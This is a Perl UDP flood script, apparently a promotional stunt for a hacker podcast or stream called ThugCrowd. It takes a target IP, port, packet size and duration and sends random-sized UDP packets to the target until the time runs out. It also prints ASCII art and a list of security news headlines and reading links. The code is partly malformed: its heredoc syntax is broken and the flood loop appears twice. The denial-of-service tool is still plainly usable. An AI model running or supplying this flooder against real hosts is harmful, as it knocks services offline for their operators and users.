#!/usr/bin/perl
use Socket;
use strict;
my ($ip,$port,$size,$time) = @ARGV;
my ($iaddr,$endtime,$psize,$pport);
$iaddr = inet_aton("$ip") or die "Cannot resolve hostname $ip\n";
$endtime = time() + ($time ? $time : 100);
socket(flood, PF_INET, SOCK_DGRAM, 17);
print << EOTEXT; """
______________ ______ ___
\ _ _ /----/ /_____/ \________
/___/ /___\ _/ // / / _ \
/ // \ // / / / /
/_____\ /_____\ _________\_____ /
\_____/ \/ \___________\
_________ ___________ ________ _______ _________
_/ /_ ) ._ // __ X /___\______ \
\ |__/ \_ |/ _/ / // / / / >
\ | / / \_ / /_ /\ / / /
\__________/ \ /______/ /____/\___ X /
\___/ \____/ \/ \____/
greetz 2 the whole crew!
TWITCH | TWITTER | PATREON | iTUNES | SPOTIFY
INSTAGRAM | SNAPCHAT | TIKTOK
TONiGHT: Talking DDoS, Packets, && Hacks with @pwrcycle
"""
EOTEXT
print "~ThugCrowd just dropped yo shit: $ip " . ($port ? $port : "random") . " With " .
($size ? "$size-byte" : "Smacked With A Large Packets?") . " " .
($time ? "for $time seconds" : "") . "\n";
for (;time() <= $endtime;) {
$psize = $size ? $size : int(rand(1024-64)+64) ;
$pport = $port ? $port : int(rand(65500))+1;
send(flood, pack("a$psize","flood"), 0, pack_sockaddr_in($pport,
$iaddr));}for (;time() <= $endtime;) {
$psize = $size ? $size : int(rand(1024-64)+64) ;
$pport = $port ? $port : int(rand(65500))+1;
send(flood, pack("a$psize","flood"), 0, pack_sockaddr_in($pport,
$iaddr));}
print << EOTEXT;
### NEWS #########################################################################
"Google's new Chrome Extension automatically checks if your passwords are secure"
"Google Play Store apps with over 4M downloads found with malware, phishing scams"
"Hacker talks to baby through Nest security cam, jacks up thermostat"
"Flaws in Popular RDP Clients Allow Malicious Servers to Reverse Hack PCs"
"New SpeakUp Backdoor Infects Linux and macOS with Miners"
"Two hacker groups responsible for 60 percent of all publicly reported hacks"
"Hacker Who Stole $5 Million By SIM Swapping Gets 10 Years in Prison"
"Discord: Coming To Terms With Data Thieves, Child Groomers And FBI Investigators"
"Researcher Assaulted By A Vendor After Disclosing A Vulnerability"
### LOL OF THE WEEK ##############################################################
"NSA branded webcam covers are see-through"
### GOOD READS ###################################################################
"Project Zero: The Curious Case of Convexity Confusion"
"Exploiting SSRF in AWS Elastic Beanstalk"
"Metasploit Domain Fronting With Microsoft Azure"
"Exploiting systemd-journald Part 1"
"iOS/macOS: task_swap_mach_voucher() does not respect MIG semantics leading to UAF"
"Charges Against Chinese Hackers Are Now Common. Why Don't They Deter Cyberattacks?"
### CHEAT CODES ##################################################################
"Interlace: A Tool to Easily Automate and Multithread Your Pentesting & Bug Bounty
Workflow Without Any Coding"
Playlist
EOTEXT